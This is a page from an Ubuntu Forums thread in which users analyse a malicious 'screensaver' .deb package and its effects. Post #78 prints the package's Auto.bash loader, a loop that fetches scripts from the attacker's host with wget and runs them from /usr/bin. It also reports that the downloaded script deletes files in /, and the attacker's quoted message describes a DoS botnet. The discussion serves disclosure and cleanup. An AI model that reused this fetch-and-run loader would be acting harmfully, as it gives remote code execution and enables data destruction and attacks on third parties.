Page 8 of 15 FirstFirst ... 678910 ... LastLast
Results 71 to 80 of 142

Thread: YOU THERE!! Malicios script installed as a DEB, please read!

  1. #71
    Join Date
    Feb 2006
    Location
    Vancouver, Canada
    Beans
    Hidden!
    Distro
    Ubuntu 12.04 Precise Pangolin

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Quote Originally Posted by akashiraffee View Post
    The real bad guy is this one:
    http://05748.t35.com
    i googled the URL and got some interesting things. it looks like this is for a phishing site to get ahold of WoW passwords or the such

    http://www.mmowned.com/forums/wow-scams/228194-wow-phishing-pack.html

    http://www.google.ca/search?q=http%3A%2F%2F05748.t35.com%2F&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-USfficial&client=firefox-a
    Last edited by dmizer; December 9th, 2009 at 11:45 AM. Reason: removed hyperlink
    Registered Linux User #429850
    Work in progress: CCNA, LPIC-1

  2. #72
    Join Date
    Oct 2009
    Location
    LinuxVille
    Beans
    41
    Distro
    Ubuntu 11.04 Natty Narwhal

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Quote Originally Posted by NoaHall View Post
    Also, could you post the output of
    Code:
     ls -a /etc/apt
    Code:
    .              sources.list              .sources.list.swm  trusted.gpg
    ..             sources.list~             .sources.list.swn  trusted.gpg~
    apt.conf.d     sources.list.d            .sources.list.swo
    preferences.d  sources.list.distUpgrade  .sources.list.swp
    secring.gpg    sources.list.save         trustdb.gpg

  3. #73
    Join Date
    Dec 2009
    Beans
    114
    Distro
    Ubuntu 9.10 Karmic Koala

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    ATT: Everyone who installed that.

    I'm gonna write a little script you can run in the background for a few days that will detect if someone is still using wget on your system. I'll post it here in ~ 30 min.
    (\ /)
    (O.o)
    (> <)
    This is Bunny. Copy Bunny into your signature to help him on his way to world domination.

  4. #74
    NoaHall is offline Iced Blended Vanilla Crème Ubuntu
    Join Date
    Mar 2009
    Beans
    1,562
    Distro
    Ubuntu 9.10 Karmic Koala

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Could you post the output of
    Code:
    ls -a /etc/apt/sources.list.d/
    too? Sorry for asking a lot - I just want to make sure there's no damage.

  5. #75
    Join Date
    Oct 2009
    Location
    LinuxVille
    Beans
    41
    Distro
    Ubuntu 11.04 Natty Narwhal

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Quote Originally Posted by akashiraffee View Post
    ATT: Everyone who installed that.

    I'm gonna write a little script you can run in the background for a few days that will detect if someone is still using wget on your system. I'll post it here in ~ 30 min.
    OK... just make sure you don't accidentally put a virus in it... O.o

  6. #76
    Join Date
    Oct 2009
    Location
    LinuxVille
    Beans
    41
    Distro
    Ubuntu 11.04 Natty Narwhal

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Quote Originally Posted by NoaHall View Post
    Could you post the output of
    Code:
    ls -a /etc/apt/sources.list.d/
    too? Sorry for asking a lot - I just want to make sure there's no damage.
    Code:
    .                               google-chrome.list.save
    ..                              playonlinux.list
    google-chrome.list              playonlinux.list.distUpgrade
    google-chrome.list.distUpgrade  playonlinux.list.save

  7. #77
    Join Date
    Sep 2008
    Location
    Ohio
    Beans
    963
    Distro
    Ubuntu 10.04 Lucid Lynx

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    I'm getting into this a little late, but did anyone look at http://05748.t35.com/ in the last few minutes? Was it always like that?

    There is something rotten, and not just grammar.
    Last edited by dmizer; December 9th, 2009 at 11:48 AM. Reason: removed hyperlink

  8. #78
    Join Date
    Jan 2008
    Beans
    4,757

    Exclamation Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Quote Originally Posted by pbrane View Post
    This is the contents of the Auto.bash script.

    Code:
    while :
    do
    rm /usr/bin/run.bash
    cd /usr/bin/
    wget http://05748.t35.com/Bots/index.php
    wget http://05748.t35.com/Bots/run.bash
    sleep 4
    rm index.php
    chmod 755 run.bash
    command -p /usr/bin/run.bash
    done
    you may want to se if run.bash is running. if so kill it. And then remove it from /usr/bin/

    gnome.sh runs Auto.bash

    Also you can whois mmowned.com and complain to the hosting company. Interesting I just looked up the hosting company and they advertise protection against DOS attacks.
    I downloaded run.bash via:
    Code:
    wget http://05748.t35.com/Bots/run.bash
    And analysed the contents to find that it is an rm command to remove all files in / (but not subdirectories).
    Last edited by ibuclaw; December 8th, 2009 at 10:57 PM. Reason: had a second look - and there was no -r

  9. #79
    NoaHall is offline Iced Blended Vanilla Crème Ubuntu
    Join Date
    Mar 2009
    Beans
    1,562
    Distro
    Ubuntu 9.10 Karmic Koala

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    Cycron: It appears to be fine. If you notice any strange behaviour, report it here.

    Taken from the site -
    If your reading this from coming from that ubuntu forums place, Well done you saw right thourgh my "Screensaver" cough cough wink wink, I can tell you this. Basically after getting some scripts to run upon start up, It then sets to work downloading another file, This can be changed on my server so in essence i could do whatever i like on your computer, But i only really want to perfrom a DOS (denial of service) attack, For no reason I'm attacking mmowned.com, Just using it as a test. Hats Off!
    Uh-oh.

    Tinvole - you did? I can't see it, only the ping.
    Last edited by NoaHall; December 8th, 2009 at 10:51 PM.

  10. #80
    Join Date
    May 2009
    Beans
    1,934
    Distro
    Ubuntu Studio 9.10 Karmic Koala

    Re: YOU THERE!! Malicios script installed as a DEB, please read!

    This is what this link (http://05748.t35.com/) says when opened via FF.

    "If your reading this from coming from that ubuntu forums place, Well done you saw right thourgh my "Screensaver" cough cough wink wink, I can tell you this. Basically after getting some scripts to run upon start up, It then sets to work downloading another file, This can be changed on my server so in essence i could do whatever i like on your computer, But i only really want to perfrom a DOS (denial of service) attack, For no reason I'm attacking mmowned.com, Just using it as a test. Hats Off! "
    Last edited by dmizer; December 9th, 2009 at 11:49 AM. Reason: removed hyperlink

Page 8 of 15 FirstFirst ... 678910 ... LastLast

Tags for this Thread

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •